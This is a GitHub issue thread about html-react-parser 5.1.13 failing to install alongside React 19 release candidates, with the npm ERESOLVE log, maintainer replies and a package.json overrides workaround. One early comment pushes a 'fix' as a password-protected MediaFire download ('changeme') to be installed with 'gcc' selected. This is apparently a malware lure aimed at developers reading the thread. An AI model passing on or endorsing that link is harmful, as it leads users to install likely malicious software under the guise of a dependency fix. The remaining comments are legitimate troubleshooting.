### ISSUE TITLE
html-react-parser with React 19

### ISSUE THREAD

**Issue by AlessandroGasperini** [remarkablemark/html-react-parser#1501]
html-react-parser with React 19

I am experiencing an issue with the html-react-parser package when using it with React 19. I’ve encountered compatibility problems which prevent the package from installing.

Version: 5.1.13

React Version: 19.0.0-rc (release candidate version)

Error Details: When attempting to install or use html-react-parser with React 19, npm reports a peer dependency conflict. The specific error message is:

```
npm error code ERESOLVE
npm error ERESOLVE unable to resolve dependency tree
npm error
npm error While resolving: nextjs@0.1.0
npm error Found: react@19.0.0-rc-fb9a90fa48-20240614
npm error node_modules/react
npm error   react@"^19.0.0-rc-fb9a90fa48-20240614" from the root project
npm error
npm error Could not resolve dependency:
npm error peer react@"0.14 || 15 || 16 || 17 || 18" from html-react-parser@5.1.13
npm error node_modules/html-react-parser
npm error   html-react-parser@"*" from the root project
```

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by remarkablemark** [comment]
@AlessandroGasperini does this resolve the issue for you? https://github.com/remarkablemark/html-react-parser/issues/1436#issuecomment-2131695591

**Comment by KABILANSRK** [comment]
@AlessandroGasperini You should wait for the official release of html-react-parser for React 19.

**Comment by aabughazaleh** [comment]
Temp solution:
you can use this in package.json (make sure to use the react version you use in your project, mine is "19.0.0-rc-66855b96-20241106"):

`"overrides": {
    "html-react-parser": {
      "react": "19.0.0-rc-66855b96-20241106"
    },
    "swr": {
      "react": "19.0.0-rc-66855b96-20241106"
    }
  },`

**Comment by remarkablemark** [comment]
Release:

- https://github.com/remarkablemark/html-react-parser/pull/1628#issuecomment-2521861131
